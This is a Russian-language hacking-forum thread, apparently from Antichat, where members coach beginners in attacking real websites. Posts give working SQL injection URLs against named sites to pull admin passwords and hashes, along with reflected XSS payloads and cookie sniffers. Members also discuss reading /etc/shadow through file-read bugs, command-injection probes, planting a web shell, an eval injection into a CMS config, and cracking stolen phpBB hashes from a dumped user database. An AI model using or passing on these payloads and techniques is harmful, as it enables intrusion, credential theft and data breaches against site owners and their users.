BigBear said:
Если у тебя права только на чтение файлов, то единственное что ты можешь делать - читать файлы


Я, конечно, новичек, но не настолько

Подскажите, какой должен быть код для запуска /bin/sh. Ведь права для запуска могут быть, я не пробовал его запустить, поскольку не знаю, как

zloy_fantom said:
Я, конечно, новичек, но не настолько
Подскажите, какой должен быть код для запуска /bin/sh. Ведь права для запуска могут быть, я не пробовал его запустить, поскольку не знаю, как


Уважаемый, у вас нету никаких прав для написания "какого либо кода". вы просто указываете путь к файлу, а скрипт открывает его. как вы хотите впихать там добавочный код чтобы файлы запускались? думайте как скрипт, все станет ясно

Konqi said:
у вас нету никаких прав для написания "какого либо кода"


Я недостаточно ясно выразился, имел ввиду, что, если указать скрипту "/bin/sh", ответом будет содержимое файла "sh", а если, допустим, указать скрипту "!#/bin/sh -l" или "/bin/!#sh -l" или "?=/bin/sh -l", или еще что-то, то ответом будет результат выполнения файла "sh" (листинг директории). Это я имел ввиду под "каким-либо кодом". Просто эти варианты я уже пробовал - не работает, может вы подскажете, если это в принципе возможно?

zloy_fantom said:
Я недостаточно ясно выразился, имел ввиду, что, если указать скрипту "/bin/sh", ответом будет содержимое файла "sh", а если, допустим, указать скрипту "!#/bin/sh -l" или "/bin/!#sh -l" или "?=/bin/sh -l", или еще что-то, то ответом будет результат выполнения файла "sh" (листинг директории). Это я имел ввиду под "каким-либо кодом". Просто эти варианты я уже пробовал - не работает, может вы подскажете, если это в принципе возможно?


если под Directory traversal Подразумываете LFI в скриптах, а не traversal на уровне сервера, то выполнение файлов/команд не возможно

zloy_fantom said:
Я недостаточно ясно выразился, имел ввиду, что, если указать скрипту "/bin/sh", ответом будет содержимое файла "sh", а если, допустим, указать скрипту "!#/bin/sh -l" или "/bin/!#sh -l" или "?=/bin/sh -l", или еще что-то, то ответом будет результат выполнения файла "sh" (листинг директории). Это я имел ввиду под "каким-либо кодом". Просто эти варианты я уже пробовал - не работает, может вы подскажете, если это в принципе возможно?


Уважаемый, Вы читаете сам файл /bin/sh , а не результат выполнения команды.

Не надо просить от читалки файлов больше, чем она умеет делать.

Konqi said:
если под Directory traversal Подразумываете LFI в скриптах, а не traversal на уровне сервера, то выполнение файлов/команд не возможно


А как это выянить?

Что вы с ним нянчитесь, тыкните его носом в гугл, и пусть узнает что такое Directory traversal и найдет отличие от выполнение системных команд.

Expl0ited said:
Что вы с ним нянчитесь, тыкните его носом в гугл, и пусть узнает что такое Directory traversal и найдет отличие от выполнение системных команд.


Гугл именно к вам и привел, полнее информации не нашел.

Нашел вот такой образец:

http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\

Охота повторить его в linux-системе. Гугл не помог

zloy_fantom said:
Гугл именно к вам и привел, полнее информации не нашел.
Нашел вот такой образец:
http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\
Охота повторить его в linux-системе. Гугл не помог


http://www.securityfocus.com/archive/107/517936/30/240/threaded


On 10 May 2011 23:29, Robin Wood wrote:
> Can anyone tell me which version of IIS fixed this style of vulnerability?
>
> http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:>
> A few people have been talking about it recently but I've never come
> across it in tests despite hitting some quite old servers. From what I
> can find reading round it was IIS 4 and 5 but I'm guessing would have
> been patched well before 6 came out.
>
> Robin
>
Typical, asked the question then found the answer:
http://www.microsoft.com/technet/security/bulletin/ms00-078.mspx
No wonder I've not seen it in the wild.
Robin
This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------


Узнай что такое читалка файлов, и что такое выполнение системных команд.

Expl0ited said:
Узнай что такое читалка файлов, и что такое выполнение системных команд.


Я понимаю эту разницу, но я не знаю возможности данной уязвимости и возможности уязвимого скрипта. Если скрипт способен запускать системные команды, то можно добиться их выполнения?

zloy_fantom said:
Я понимаю эту разницу, но я не знаю возможности данной уязвимости и возможности уязвимого скрипта. Если скрипт способен запускать системные команды, то можно добиться их выполнения?


ОН НИХЕРА НЕ ЗАПУСКАEТ, ты просто открываешь файл в режиме чтения, аналоги: cat, fopen, file, etc

Expl0ited said:
ОН НИХЕРА НЕ ЗАПУСКАEТ, ты просто открываешь файл в режиме чтения, аналоги: cat, fopen, file, etc


Понял, спасибо, поищу другую уязвимость

А структура каталогов не содержится ли в каком-либо файле?

И еще мысль в догонку:

fstab я прочитал, в нем посмотрю путь к свопу и попробую прочитать его. Надеюсь, оттуда многое можно почерпнуть.

И еще вопрос:

Как в запросе /etc/shadow применить авторизацию, чтобы прочитать его от имени пользователя? Надеюсь, что в системе есть пользователь с пустым паролем (список пользователей у меня есть)

zloy_fantom said:
Понял, спасибо, поищу другую уязвимость
А структура каталогов не содержится ли в каком-либо файле?


Нет.


Как в запросе /etc/shadow применить авторизацию, чтобы прочитать его от имени пользователя? Надеюсь, что в системе есть пользователь с пустым паролем (список пользователей у меня есть)


У бажного скрипта должны быть установлен suid бит. Иначе - никак. Но я не думаю, что возможно в твоём случае.

BigBear said:
Нет.
У бажного скрипта должны быть установлен suid бит. Иначе - никак. Но я не думаю, что возможно в твоём случае.


Подскажите, как должен выглядеть запрос, я попробую, мало-ли что напихано в том скрипте....

zloy_fantom said:
Подскажите, как должен выглядеть запрос, я попробую, мало-ли что напихано в том скрипте....


О боже мой... Ну почему модераторам не платят зарплату? Нервов ведь никаких не хватит !!!

_ttp://pascal.tsu.ru/unix/files/files4.html

zloy_fantom, тебе нужно для начала выяснить что за тип уязвимости.

Если там LFI - то ты сможешь выполнить php код.

Попробуй прочесть index.php - если увидишь ИСХОДНЫЙ код - это не лфи.

Попробуй проверить на code exec. Тоесть что-то в духе:

?id=1; ls

?id=1; & ls

?id=1; | ls

ну и таму подобное.

Но САМЫЙ ЛУЧШИ ВАРИАТН - прочитай этот же файл (в котором баг), и кинь сюда его код :3

Можешь кинуть линк в лс, посмотрю.

p.s. BigBear, че злой такой? Человек учится. Хотя бы вопросы грамотно задает, через годик сам будет в треде советы давать, меня вспомни.

-Ыыы, как поля подобрать?

___

Так, теперь по моим траблам.

Как я понял ";" обрубает все, что после него.


id='
;
+ololo,+ne+rabotet...




PHP:
Произошла ошибка.Просмотр� �новостей недоступен.



id='+ololo,+ne+rabotet...




PHP:
Warning:SQLite3::query():Unable to prepare stat ement:1,near"ololo":syntax error in/usr/local/servers/news/news_model.php on line 381 Произошла� �ошибка.Просмотр новостей недоступен.

Как выполнить тогда туеву хучу команд через ";"? О_0

Может можно выполнить по очереди? Тогда как? Union блаблабла?

Добрый день, помогите новичку

Нашел sql inject в OpenX-2.8.5

в куках sessionID ставим одинарную кавычку и переходим http://localhost/www/admin/password-recovery.php

вылезает такая скуль


MDB2 Error: constraint violation
_doQuery: [Error message: Could not execute statement]
[Last executed query: INSERT INTO ox_session (sessionid , sessiondata , lastused ) VALUES ('c8c724c9aa843eecc75e388ad9bс0956\\\'' , 'a:1:{s:4:\"user\";b:0;}' , '2012-12-05 05:56:53' ) ]
[Native code: 1062]
[Native message: Duplicate entry 'c8c724c9aa843eecc75e388ad9bс0956' for key 'PRIMARY']


можно ли, что-то сделать?

Спасибо

Никак не получается раскрутить вот это:

http://www.popmech.ru/templates/admin/functions/wysiwyg/admin_wysiwyg_iframe.php?area=full_area&dir=%22%3E%3C/head%3E%3Cbody%3E%3Cimg+src=http://img.yandex.net/i/www/logo.png%3E

http://s018.radikal.ru/i509/1212/92/5afb7c3e6df7.jpg

c0n said:
Никак не получается раскрутить вот это:
http://www.popmech.ru/templates/admin/functions/wysiwyg/admin_wysiwyg_iframe.php?area=full_area&dir=%22%3E%3C/head%3E%3Cbody%3E%3Cimg+src=http://img.yandex.net/i/www/logo.png%3E
http://s018.radikal.ru/i509/1212/92/5afb7c3e6df7.jpg


Это Пассивная XSS. Потому я и удалил её из той темы.

Что требуется то ??

c0n said:
Никак не получается раскрутить вот это:
http://www.popmech.ru/templates/admin/functions/wysiwyg/admin_wysiwyg_iframe.php?area=full_area&dir=%22%3E%3C/head%3E%3Cbody%3E%3Cimg+src=http://img.yandex.net/i/www/logo.png%3E
http://s018.radikal.ru/i509/1212/92/5afb7c3e6df7.jpg


Там же xss обычная

http://rghost.ru/42021284/image.png

BigBear said:
Это Пассивная XSS. Потому я и удалил её из той темы.
Что требуется то ??


Я так и понял. Просто набрел случайно. Вот решил посмотреть, что с таким сделать можно.

SVAROG said:
Там же xss обычная
http://rghost.ru/42021284/image.png



Не на всех браузерах такое замечательное окошко всплывает. Вроде фильтрация еще имеет место быть.

Спасибо.

Когда-то давно был сниффер на античате. Пропал?

Что можно сделать?

c0n said:
Не на всех браузерах такое замечательное окошко всплывает.
Вроде фильтрация еще имеет место быть.
Спасибо.
Когда-то давно был сниффер на античате. Пропал?
Что можно сделать?


Вот тебе снифер


http://madnet.name/files/1/9.html


Только не спрашивай как его заюзать, а лудше почитай статьи про XSS!

Возможно задам довольно глупый вопрос, но как мне вывести запрос из mysql inj в нужной мне кодировке ?

К примеру есть запрос:

GET /index.php?sth=999999.9+union+all+select+text,2,3+f rom+art--

При этом вывод из бд в кодировке UTF-8, а кодировка сайта WINDOWS-1251 (cp1251). Как мне сделать так, чтобы вывод был в кодировке cp1251 ?

Вообще(вроде), это можно сделать так:

SET NAMES cp1251

SET CHARACTER SET cp1251

Но как мне все это объединить в один запрос ?

kise said:
Возможно задам довольно глупый вопрос, но как мне вывести запрос из mysql inj в нужной мне кодировке ?
К примеру есть запрос:
GET /index.php?sth=999999.9+union+all+select+text,2,3+f rom+art--
При этом вывод из бд в кодировке UTF-8, а кодировка сайта WINDOWS-1251 (cp1251). Как мне сделать так, чтобы вывод был в кодировке cp1251 ?
Вообще(вроде), это можно сделать так:
SET NAMES cp1251
SET CHARACTER SET cp1251
Но как мне все это объединить в один запрос ?


Здесь два варианта, либо юзать cast() или CONVERT(),либо шифровать и дешифровать данные, типа: unhex(hex(version())), в вашем случаи, это будет выглядеть так:

/index.php?sth=999999.9+union+all+select+CONVERT(te xt+using+latin1),2,3+from+art--, либо же:

/index.php?sth=999999.9+union+all+select+unhex(hex( text)),2,3+from+art--, и потом воспользоваться например: http://www.string-functions.com/hex-string.aspx для расшифровки полученного результата

/index.php?sth=999999.9+union+all+select+CONVERT("заголовок - "+USING+cp1251),CONVERT(title+USING+cp1251),3+from+ art--

Вот так, выводится заголовок из статьи правильно, но вот"заголовок-" => "скачать" . В чем проблема ?

Ограничение в строке на длину походу, вообще первый раз с таким фильтром встречаюсь.


www.fernando9torres.com/index.php?p=1

narviss said:
Ограничение в строке на длину походу, вообще первый раз с таким фильтром встречаюсь.


Отправь пост запрос

http://www.fernando9torres.com

p=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20--+

winstrool said:
Вот тебе снифер
Только не спрашивай как его заюзать, а лудше почитай статьи про
XSS
!



Как юзать знаю.

Просто раньше на античате был рабочий онлайн сниффер. Теперь придется хостера искать

Что делать знаю.

Спасибо.

А сниффер вот этот http://www.kanicq.ru/sniffer/

c0n said:
Как юзать знаю.
Просто раньше на античате был рабочий онлайн сниффер. Теперь придется хостера искать
Что делать знаю.
Спасибо.
А сниффер вот этот http://www.kanicq.ru/sniffer/


Давненько уже сниффер на ачате не наблюдается. Вы как будто с каменного века пришли . Хостинг не проблема, если интересуют бесплатные варианты, то вот тема (https://antichat.live/threads/194269/).

Подскажите мануальчик: с описанием функций mysql (floor,mid,ansi, -- f ...)активно используемых в раскрутке скулей и обхода фильтрации /**/ () ....

mix0x0 said:
Давненько уже сниффер на ачате не наблюдается. Вы как будто с каменного века пришли
. Хостинг не проблема, если интересуют бесплатные варианты, то вот
тема (https://antichat.live/threads/194269/)
.



Огромное спасибо за тему.

Очень помогла

Итак. Залил сниффер.

Проверяем фильтрацию

http://www.popmech.ru/templates/admin/functions/wysiwyg/admin_wysiwyg_iframe.php?area=full_area&dir=%22%3E%3C%3E=%28%29;/%22%22+%27%27?

Ответ: <>=();/\"\" \'\'?">

" - \"

' - \'

+ - удалился

Соит ли дальше сражаться?

Пробовал через инклуд js

Через String.fromCharCode()

Ничего не получается.

c0n,

_/nextoldesttothread76143.html

_http://www.securitylab.ru/analytics/274302.php

ReVOLVeR said:
c0n,
_/nextoldesttothread76143.html
_http://www.securitylab.ru/analytics/274302.php



За ссылки огромное спасибо. Вроде работает

НО:

1) Выпадает ряд браузеров (IE, Chrome - у мну не завелся)

2) Доступна по конструкции типа


Code:
Ссылко в Сибирь

Других вариантов использования не нашел.

c0n, прояви си) напиши админу, не работает ссылка в опере и твоя xss

ReVOLVeR said:
c0n, прояви си) напиши админу, не работает ссылка в опере и твоя xss


По работоспособности


SVAROG said:
Там же xss обычная
http://rghost.ru/42021284/image.png


Писал. Там то ли не понимают, то ли не хотят понять.

Pirotexnik said:
zloy_fantom
Но
САМЫЙ ЛУЧШИ ВАРИАТН
- прочитай этот же файл (в котором баг), и кинь сюда его код :3


Последовал вашему совету, вот скрипт:


Code:
$pic\n");
print("\n");
?> Назад

Как его можно использовать? Спасибо

zloy_fantom said:
Последовал вашему совету, вот скрипт
Как его можно использовать? Спасибо




Code:
$pic = htmlspecialchars((string) $_GET["pic"]);
readfile("torrent_files/images/$pic");

ReadFile как бы намекает что это только читалка файлов.

Прошу прощения, что задаю дурацкие вопросы, но сам пода не могу дотумкать:

разместил-таки шелл на сайте, подключившись через openVPN по адресу:

//ххх.ххх.ххх.ххх/shell.php

Но при попытке его запустить получаю следующее:

file://ххх.ххх.ххх.ххх/shell.php

Как следствие, получаю его код, если-же вписать в адресную стоку http://ххх.ххх.ххх.ххх/shell.php то происходит редирект:

http://site/shell.php и выводится: "No input file specified."

Как-же его все-таки запустить? Спасибо

Да, может это важно, если отключиться от openVPN, то указанный ip не доступен

zloy_fantom said:
Прошу прощения, что задаю дурацкие вопросы, но сам пода не могу дотумкать:
разместил-таки шелл на сайте, подключившись через openVPN по адресу:
//ххх.ххх.ххх.ххх/shell.php
Но при попытке его запустить получаю следующее:
file://ххх.ххх.ххх.ххх/shell.php
Как следствие, получаю его код, если-же вписать в адресную стоку http://ххх.ххх.ххх.ххх/shell.php то происходит редирект:
http://site/shell.php и выводится: "No input file specified."
Как-же его все-таки запустить? Спасибо
Да, может это важно, если отключиться от openVPN, то указанный ip не доступен


Рядом с шеллом был .htaccess ??

BigBear said:
Рядом с шеллом был .htaccess ??


вообще-то путь к шеллу http://ххх.ххх.ххх.ххх/shell.php на самом деле длинный, я его просто сократил, возможно .htaccess должен быть не в папке с шеллом, а в корневой...

Что-то я совсем запутался....

Выходит, .htaccess как раз и нужен для редиректа, на ххх.ххх.ххх.ххх/ я его не нашел

Nightmarе said:
Помогите найти один сплойт под админку DLE.
Раньше был замечательный публичный сплойт позволявший путём отправки специального POST запроса скрипту с админской сессией в дальнейшем выполнять php код на всем сайте, недавно он мне сильно понадобился, я начал его искать, но найти так и не смог, то ли его из паблика убрали, то ли я плохо искал, я только нашёл недоработанный кусок этого сплойта:
/showpost.php?p=2353405&postcount=167
Если у кого имеется полный рабочий вариант, пожалуйста поделитесь.


Это сплоит для старой версии, и там достаточно заюзать конструкцию по типу ';eval($_GET[e]);//

и сохранить конфиг

инклуд или просто читалка?

хелп ми,гайс...

Url: http://site.com/index.php?thumbnail={code}

или

http://site.com/index.php?download={code}

кусок кода для этих 2 параметров:


Code:
if ($_GET["thumbnail"]!="") {
GLOBAL $thumbnailHeight, $cacheThumbnails;
$thumbnailCacheSubdir = ".snifthumbs";

$file = safeDirectory(urldecode($_GET["thumbnail"]));
doConditionalGet($_GET["thumbnail"],filemtime($file));

$thumbDir = dirname($file)."/".$thumbnailCacheSubdir;
$thumbFile = $thumbDir."/".basename($file);
if ($cacheThumbnails) {
if (file_exists($thumbDir)) {
if (!is_dir($thumbDir)) {
$cacheThumbnails = false;
}
} else {
if (@mkdir($thumbDir)) {
chmod($thumbDir, "0777");
} else {
$cacheThumbnails = false;
}
}
if (file_exists($thumbFile)) {
if (filemtime($thumbFile)>=filemtime($file)) {
Header("Location: ".dirname($_SERVER["PHP_SELF"])."/".$thumbFile);
die();
}
}
}
$contentType = "";
$extension = strtolower(substr(strrchr($file, "."), 1));
switch ($extension) {
case "gif": $src = imagecreatefromgif($file); $contentType="image/gif"; break;
case "jpg": // fall through
case "jpeg": $src = imagecreatefromjpeg($file); $contentType="image/jpeg"; break;
case "png": $src = imagecreatefrompng($file); $contentType="image/png"; break;
default: die(); break;
}
$srcWidth = imagesx($src);
$srcHeight = imagesy($src);
$srcAspectRatio = $srcWidth / $srcHeight;

$maxAge = 3600; // one hour
Header("Cache-Control: public, max-age=$maxAge, must-revalidate");
Header("Expires: ".createHTTPDate(time()+$maxAge));

if ($srcHeight $srcHeight) {
$thumbWidth = $thumbnailWidth;
$thumbHeight = $thumbWidth / $srcAspectRatio;
} else {
$thumbHeight = $thumbnailHeight;
$thumbWidth = $thumbHeight * $srcAspectRatio;
}
if (function_exists('imagecreatetruecolor')) {
$thumb = imagecreatetruecolor($thumbWidth, $thumbHeight);
} else {
$thumb = imagecreate($thumbWidth, $thumbHeight);
}
imagecopyresampled($thumb, $src, 0, 0, 0, 0, $thumbWidth, $thumbHeight, $srcWidth, $srcHeight);
Header("Content-Type: image/jpeg");
if ($cacheThumbnails) {
imagejpeg($thumb, $thumbFile);
chmod($thumbFile, "0777");
readfile($thumbFile);
} else {
imagejpeg($thumb);
}
}
die();
}
if ($_GET["download"]!="") {
$download = stripslashes($_GET["download"]);
$filename = safeDirectory($path.rawurldecode($download));
if (
!file_exists($filename)
OR fileIsHidden($filename)
OR (substr(strtolower($filename), -4)==".php" AND !$allowPHPDownloads)) {

Header("HTTP/1.0 404 Not Found");
$displayError[] = sprintf(translate("File not found: %s"), $filename);
} else {
//doConditionalGet($filename, filemtime($filename));
Header("Content-Length: ".filesize($filename));
Header("Content-Type: application/x-download");
Header("Content-Disposition: attachment; filename=\"".rawurlencode($download)."\"");
readfile($filename);
die();
}
}




allow_url_fopen = On

allow_url_include = Off

file:/// - работает

php://filter/convert.base64-encode/resource - работает

php://input или data: - не получилось

логи читает,однако php-код не выполняет(код виден только в исходнике страницы)

возможен ли тут RFI или LFI?

HeaVeNSeR said:
хелп ми,гайс...
Url: http://site.com/index.php?thumbnail={code}
или
http://site.com/index.php?download={code}
кусок кода для этих 2 параметров




Code:
if ($_GET["thumbnail"]!="") {
...
...
...
if ($cacheThumbnails) {
imagejpeg($thumb, $thumbFile);
chmod($thumbFile, "0777");
readfile($thumbFile);
} else {
imagejpeg($thumb);
}
}
die();
}
if ($_GET["download"]!="") {
...
...
...
readfile($filename);
die();
}
}

Читалки файлов. Большего из них не выжмешь.

BigBear,спс...

в этой теме (https://antichat.live/threads/91807/) с readfile якобы можно получить веб-шелл...у меня так и не вышло...

З.Ы. полный соурс этого файла в паблике есть оказывается)

[URL="http://www.bitfolge.de/download/source/snif.phps"]=>Линк

zloy_fantom said:
Прошу прощения, что задаю дурацкие вопросы, но сам пода не могу дотумкать:
разместил-таки шелл на сайте, подключившись через openVPN по адресу:
//ххх.ххх.ххх.ххх/shell.php
Но при попытке его запустить получаю следующее:
file://ххх.ххх.ххх.ххх/shell.php
Как следствие, получаю его код, если-же вписать в адресную стоку http://ххх.ххх.ххх.ххх/shell.php то происходит редирект:
http://site/shell.php и выводится: "No input file specified."
Как-же его все-таки запустить? Спасибо
Да, может это важно, если отключиться от openVPN, то указанный ip не доступен


Тут я поторопился с выводом: на \\ххх.ххх.ххх.ххх\ развернут именно OpenVPN, собственно и положил я шелл на него просто через виртуальную сеть, получился путь "Сеть\\ххх.ххх.ххх.ххх\share\instal l\winrar\keygen\shell.php", видимо, поэтому браузер и подхватывает его через протокол "file://", если обратиться напрямую к адресу http://ххх.ххх.ххх.ххх/ (или любому подкаталогу), происходит редирект на целевой сайт http://site/, как я и писал, при этом ip целевого сайта другой. При этом я точно знаю, что админ у виртуальной сети и целевого сайта один и тот-же, но не могу быть уверенным, что они подняты на одной машине. Как можно это выяснить?

Может, в такой ситуации, я вообще не смогу запустить шелл?

Спасибо

grimnir said:
Помогите пожалуйста составить верный запрос,чтобы вытянуть пароли. Уже час сижу, голова не варит h**p://store.vampirefreaks.com/?cat_id=-11'+union+all+select+1,2,(select+concat(0x27,0x7e, Users.user_password,0x27,0x7e)+from+`synthtec`.Use rs+Order+by+user_password+limit+5,1),4,5+and+1='2


Изучай вниматильней мануалы


ht_p://store.vampirefreaks.com/?cat_id=-11%27+union+all+select+1,2,user_password,4,5+from+ synthtec.Users+limit+0,1+--+




P.S: у вас там файловые привилегии, раскрытие путей, есть папки для запеси, шелл отлично льется!

grimnir said:
Да,подтяну скиллы свои ,благодарю за совет. Интересует вот что только -почему у них там пароли вопросами? или это у меня только так?


Проблемы с кодировкой скорее всего.

Кто-нибудь знает, чем можно открыть файлы .MYD.MYI.frm в удобном оконном интерфейсе? Как-то неохота через командную строку работать (не зная команд mysql)

Спасибо

zloy_fantom said:
Кто-нибудь знает, чем можно открыть файлы .MYD.MYI.frm в удобном оконном интерфейсе? Как-то неохота через командную строку работать (не зная команд mysql)
Спасибо


Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы

BigBear said:
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы


Спасибо, а можно чуть подробнее: я качаю денвер, устанавливаю его, получив локалхост, загружаю в него полученные файлы БД...

А дальше?

phpmyadmin - это примочка денвера? Как ее запустить?

zloy_fantom said:
phpmyadmin - это примочка денвера? Как ее запустить?


Снимаю вопрос, нарыл инфу, то, что надо, спасибо, вечером поковыряю

Здравствуйте, решил приобщиться к SQLi(первый день) и назрел такой вот вопрос:

почему при зупросе http://bkp.bel-bkp.ru/site.php?id=165668-1%20union%20select%201%20-- ошибка, а при http://bkp.bel-bkp.ru/site.php?id=165668-1%20group%20by%201%20-- нормально все?

Вроде ж 0 столбцов быть не может, а если бы было больше 1, то group by выдало ошибку.

Заранее благодарен.

FunOfGun said:
Здравствуйте, решил приобщиться к SQLi(первый день) и назрел такой вот вопрос:
почему при зупросе
http://bkp.bel-bkp.ru/site.php?id=165668-1%20union%20select%201%20--
ошибка, а при
http://bkp.bel-bkp.ru/site.php?id=165668-1%20group%20by%201%20--
нормально все?
Вроде ж 0 столбцов быть не может, а если бы было больше 1, то group by выдало ошибку.
Заранее благодарен.


1.Потому что с помощью group by мы подбираем количество колонок и он будт выводить тебе инфу до тех пор пока ты не превысишь этот лемит, т.е в твоем случае всего колоно 25
и свыше этого числа уже будет выводиться ошибка.


http://bkp.bel-bkp.ru/site.php?id=165668-1 group by 25 --


2. спомощью union select ты можешь вывести принтабельные поля, что облегчает нам дальнейшее проникновение,


http://bkp.bel-bkp.ru/site.php?id=165668-1 and 1=0 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25 --


3. Изучите данные раздел, синтаксисы запросов, там все по полочкам расписано /thread43966.html

winstrool said:
1.Потому что с помощью
group by
мы подбираем количество колонок и он будт выводить тебе инфу до тех пор пока ты не превысишь этот лемит, т.е в твоем случае всего колоно
25

и свыше этого числа уже будет выводиться ошибка.
2. спомощью
union select
ты можешь вывести принтабельные поля, что облегчает нам дальнейшее проникновение,
3. Изучите данные раздел, синтаксисы запросов, там все по полочкам расписано
/thread43966.html


Спасибо за ответ, именно по этому руководству и учился. Там оказывается в пункте, посвященном group by, в объяснении первого примера ошибка.

Товарищи, прошу помощи с SQL injection.

Сервер отвечает так:


Invalid query
SELECT r.name FROM role as r INNER JOIN admin as a ON (a.role_id = r.role_id) WHERE a.nik='
' UNION (SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=`admin` LIMIT 0,1) --
'
1054: Unknown column 'admin' in 'where clause'


Цветом выделена моя инъекция.

Я так понимаю, он не может найти таблицу `admin` потому что мой запрос попал в INNER JOIN, верно?

Как можно обойти?

herfleisch said:
Товарищи, прошу помощи с SQL injection.
Сервер отвечает так:
Цветом выделена моя инъекция.
Я так понимаю, он не может найти таблицу `admin` потому что мой запрос попал в INNER JOIN, верно?
Как можно обойти?


Засвети урл ошибки, посмотрим на живом примере!

winstrool said:
Засвети урл ошибки, посмотрим на живом примере!


Это локальный сервер. К сожалению, нет возможности скинуть линк, ибо он получится вида http://192.168.x.x/script.php

BigBear said:
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы


Получилось, вижу пользователей, хеши в md5(phpbb3) и соль, но подозреваю, что соль могла не применяться, можно как-то по хешам определить, посолены они, или нет? И еще вопрос: не нашел сетевых ресурсов расшифровки именно md5(phpbb3)-хешей, может у кого есть на примете? Локально пока остановился на Extreme GPU Bruteforcer, у меня печ560, вроде-бы это лучшее решение, он может сразу обрабатывать файл с паролями и файл с хешами. Как теперь извлечь столбец с хешами из БД в текстовый файл? Там около пятисот значений, так что вручную не осилю.

Спасибо

zloy_fantom said:
не нашел сетевых ресурсов расшифровки именно md5(phpbb3)-хешей, может у кого есть на примете?


http://www.cmd5.org/

grimnir said:
http://www.cmd5.org/


Спасибо

Подскажите что можно сделать

http://www.mywed.ru/photographer/popular/

вбивая в строку поиска

'">alert('a');

нажимаем найти получаем ошибку, и потом кликаем на ссылку войти

отрабатывает alert()

Как это использовать можно.

vladimircape said:
Подскажите что можно сделать
http://www.mywed.ru/photographer/popular/
вбивая в строку поиска
'">alert('a');
нажимаем найти получаем ошибку, и потом кликаем на ссылку войти
отрабатывает alert()
Как это использовать можно.


Там PostgreSQL, можно инъекцию провести.

MaxFast said:
Там
PostgreSQL
, можно инъекцию провести.


Но как я понял по ошибкам там Zend фреймворк и используется PDO, просто там не получится.

Помогиет кто-нить раскурить эту ссылку... Если не трудно в ЛС... что и как вы сделали... там вроде как MSAccess но с данной СУБД у меня ничего не получается((


Code:
http://www.mooeraudio.com/en/ProductInfo.asp?id=13

GhostW said:
Помогиет кто-нить раскурить эту ссылку... Если не трудно в ЛС... что и как вы сделали... там вроде как MSAccess но с данной СУБД у меня ничего не получается((

Code:
http://www.mooeraudio.com/en/ProductInfo.asp?id=13



Угу. Это MsAccess

_ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,1 11222333444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9+from+adminuser%00

_ttp://www.mooeraudio.com/en/ProductInfo.asp?id=13+and+1=2+union+select+1,2,3,( select+top+1+cstr([adminpwd])+from+(select+top+1+*+from+(select+top+1+*+from+[adminuser]+order+by+1)+t+order+by+1+desc)t),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19+from+adminuser%00

4 самых важных момента

1) Выборка всегда должна идти из какой-либо таблицы, иначе запрос некорректен

2) Для отсечения зпроса работает только нулл байт %00 или %16

3) Все таблицы/колонки подбираются в слепую, при условии что не доступны сисемные таблички.

4) Для конвертирования получаемых данных в строковый тип используй cstr()

Приветствую, помогающие!

Подскажите как быстро избавится от eval, в скриптах? Очень часто сталкиваюсь, что весь joomla сайт, включая системные скрипты, файлов шаблонов подвержен вставкам eval. Скорее всего вставляют автоматом, т.к. все в одном месте (расположение eval'ов), все eval одни и те же - редиректят мобильный траф.

Zed0x said:
Приветствую, помогающие!
Подскажите как быстро избавится от eval, в скриптах? Очень часто сталкиваюсь, что весь joomla сайт, включая системные скрипты, файлов шаблонов подвержен вставкам eval. Скорее всего вставляют автоматом, т.к. все в одном месте (расположение eval'ов), все eval одни и те же - редиректят мобильный траф.


Тебе поможет suhosin-extension

Вот можешь здесь (http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval) почитать про его настройки

Code:
http://cs.man1a.com/e107_files/cache/phpinfo.php

уязвимы?

beBoss said:

Code:
http://cs.man1a.com/e107_files/cache/phpinfo.php

уязвимы?


кто?

Заливка шелла через phpinfo + LFI

beBoss said:
Заливка шелла через phpinfo + LFI


ну если на сайте есть LFI то да

Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю'%20group%20by%201%20-- во все параметры, а потом '%20group%20by%201000%20--, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.

Ребят помогите разобрать запрос :

нужно чтоб выводил (user_login,0x7e,user_pass) where+ID=1

никак не разберу.

Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.)

1%20and%28select%201%20from%28select%20count%28*%2 9%2Cconcat%28%28select%20%28select%20%28select%20c oncat%280x27%2C0x7e%2Cwp_users.user_pass%2C0x27%2C 0x7e%29%20from%20%60kazachstan%60.wp_users%20Order %20by%20user_login%20limit%200%2C1%29%20%29%20from %20%60information_schema%60.tables%20limit%200%2C1 %29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60inf ormation_schema%60.tables%20group%20by%20x%29a%29% 20and%201%3D1

FunOfGun said:
Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю
'%20group%20by%201%20--
во все параметры, а потом
'%20group%20by%201000%20--
, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.


А если %20 фильтруется ? А если -- ?? А если group by ?

Абсолютно неверный подход имхо.


Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.)


notepad.exe - Win+R - Заменить (%20) на (+)

Аналогично всё остальное

BigBear said:
А если
%20
фильтруется ? А если
--
